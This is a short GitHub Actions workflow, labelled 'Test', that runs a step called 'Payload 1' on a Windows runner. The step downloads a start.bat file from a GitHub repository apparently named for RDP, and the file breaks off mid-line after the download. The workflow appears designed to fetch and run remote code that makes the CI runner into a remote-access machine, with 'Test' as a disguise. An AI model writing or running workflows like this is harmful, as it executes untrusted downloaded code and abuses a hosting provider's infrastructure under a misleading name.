name: Test
on: workflow_dispatch

jobs:
  build:
    strategy:
      fail-fast: false
      matrix:
        os: [windows-latest]
        node: ['16']
        include:
        - os: windows-latest
          commandPrefix: ''
    runs-on: ${{ matrix.os }}
    steps:
    - name: Payload 1
      run: |
        cd C:\
        C:
        dir
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" mkdir Resource
        cd C:\Resource
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest https://raw.githubusercontent.com/FleterA2/rdp/main/resources/start.bat -OutFile start.bat
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 